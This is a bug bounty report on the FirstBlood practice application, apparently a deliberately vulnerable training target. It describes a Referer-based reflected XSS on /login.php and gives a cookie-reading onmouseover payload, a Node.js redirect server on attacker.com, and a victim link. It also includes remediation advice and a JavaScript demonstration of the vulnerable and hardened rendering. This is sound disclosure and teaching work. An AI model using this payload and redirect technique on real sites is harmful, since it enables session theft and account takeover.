FirstBlood-#637 Referer Based XSS on /login.php endpoint leading to ATO
This issue was discovered on FirstBlood v2



On 2021-10-26, holybugx Level 5 reported:

Description

Hello Sean,

The /login.php endpoint is vulnerable to Referer-based XSS which leads to account takeover. Previously there was an XSS possibility on this endpoint using the ref parameter. The developer properly fixed that vulnerability. However, this time the Referer header is reflected without sanitization on the /login.php endpoint, which results in another XSS.

Steps To Reproduce

  1. Open the /login.php endpoint and click Secure Login, and you will face the Return to previous page button:

  2. Use the following payload as the Referer header value, and observe the response:
'onmouseover=alert(document.cookie)//

The Referer value is reflected without proper sanitization in the source code. Hover your mouse over the Return to previous page button and the XSS executes:

Exploitation

As this is a Referer based XSS, the exploitation scenario is different. The attacker hosts the following Node.js code on his server:

const express = require('express');

const app = express();

// Answer every path: the XSS payload lives in the request path, and that
// URL becomes the Referer of the navigation triggered below.
app.get('*', (req, res) => {
  // Without this header, browsers send only the origin (no path) as the
  // Referer on a cross-origin navigation, so the payload would be lost.
  res.set('Referrer-Policy', 'unsafe-url');
  res.set('Content-Type', 'text/html');
  // Client-side navigation to the vulnerable page; "target-url" is the
  // /login.php URL on the target.
  res.end('<script>location.replace("target-url");</script>');
});

app.listen(80);

Then the attacker gives the following link to the victim:

http://attacker.com/test'onmouseover=alert(document.cookie)//
  • The server handles the request and responds with <script>location.replace("target")</script>.
  • In the redirect request, the Referer will be set to http://attacker.com/test'onmouseover=alert(document.cookie)//
  • The Referrer-Policy is needed because modern browsers don't pass the Referer with a path by default (only the origin) for cross-domain navigation.

After the victim hovers the mouse over the Return to previous page, the XSS executes.

Impact

  • XSS leading to various users' account takeover.

Remediation

  • Implement proper sanitization of the Referer header.
  • Set the HttpOnly flag on cookies so that JavaScript cannot access them.
  • Remove/Expire the drps cookies after logging out.

Kind Regards,

HolyBugx

P3 Medium

FirstBlood ID: 19
Vulnerability Type: Reflective XSS

The parameter ?ref= on login.php was fixed and $_SERVER['HTTP_REFERER'] was used instead. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments, for example!) and the Referer header is vulnerable to reflective XSS.
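The root cause described above (the raw $_SERVER['HTTP_REFERER'] dropped into the link's quoted href) and the fix the report recommends, as an added example that is not part of the report or of the FirstBlood code. It is written in JavaScript so it runs with Node alone rather than a PHP stack. Assumptions: the Return to previous page link is rendered as <a href='REFERER'>...</a> (the payload 'onmouseover=...// only works against a single-quoted href, so that is the markup modelled), and https://firstblood.example is a placeholder origin, not the real site. The attacker URL is the one from the report.

```javascript
// Added example; not code from the report or from the FirstBlood application.
// Assumption: /login.php renders the link as <a href='REFERER'>...</a>, because
// the payload 'onmouseover=...// can only break out of a single-quoted href.
// SITE_ORIGIN is a placeholder, not FirstBlood's real origin.

const SITE_ORIGIN = "https://firstblood.example";
const PAYLOAD_REFERER = "http://attacker.com/test'onmouseover=alert(document.cookie)//";

// Vulnerable: the raw header is concatenated into an attribute, which is what
// echoing $_SERVER['HTTP_REFERER'] without escaping amounts to.
function renderVulnerable(referer) {
  return `<a href='${referer}'>Return to previous page</a>`;
}

// Layer 1 of the fix: only honour a Referer that parses and sits on our own
// origin; a missing, malformed or cross-origin value falls back to a fixed path.
function safeReturnTarget(referer) {
  if (typeof referer !== "string") return "/";
  let url;
  try {
    url = new URL(referer);
  } catch {
    return "/";
  }
  if (url.origin !== SITE_ORIGIN) return "/";
  return url.pathname + url.search;
}

// Layer 2: HTML attribute encoding, so no character in the value can close
// the quoted attribute or start a new one. This part works whether or not
// the browser happened to percent-encode the quote in the Referer.
const ATTR_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeAttr(value) {
  return value.replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

function renderHardened(referer) {
  return `<a href='${escapeAttr(safeReturnTarget(referer))}'>Return to previous page</a>`;
}

// Simplified model of the HTML tokenizer's start-tag handling: after a quoted
// attribute value, any character other than whitespace, "/" or ">" begins a
// new attribute name. That rule is what turns the stray quote in the payload
// into a live onmouseover handler.
function attributeNames(html) {
  const startTag = html.match(/<a\b[^>]*>/)[0];
  const inner = startTag.replace(/^<a/, "").replace(/\/?>$/, "");
  const attr = /([^\s=>'"\/]+)(?:=("[^"]*"|'[^']*'|[^\s>]*))?/g;
  const names = [];
  let m;
  while ((m = attr.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

function hasEventHandler(html) {
  return attributeNames(html).some((name) => name.startsWith("on"));
}

// Stand-alone run: show both renderings and the attributes each one ends up with.
for (const [label, render] of [["vulnerable", renderVulnerable], ["hardened", renderHardened]]) {
  const html = render(PAYLOAD_REFERER);
  console.log(`${label}: ${html}`);
  console.log(`  attributes: ${attributeNames(html).join(", ")}`);
}
```

The vulnerable rendering ends up with two attributes, href and onmouseover, which is the bug; the hardened one keeps a single href. Validating the Referer against the site's own origin is the stronger of the two layers here, since the link is only meant to go back to a page on the same site anyway, and the attribute encoding is the safety net for any value that does get through.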

Report Feedback

@zseano

Creator & Administrator


Nice find, thanks for providing a working PoC. Actually, though, from my testing I am only able to reproduce this on IE, and the ' character is encoded for me on the latest versions of Firefox and Chrome.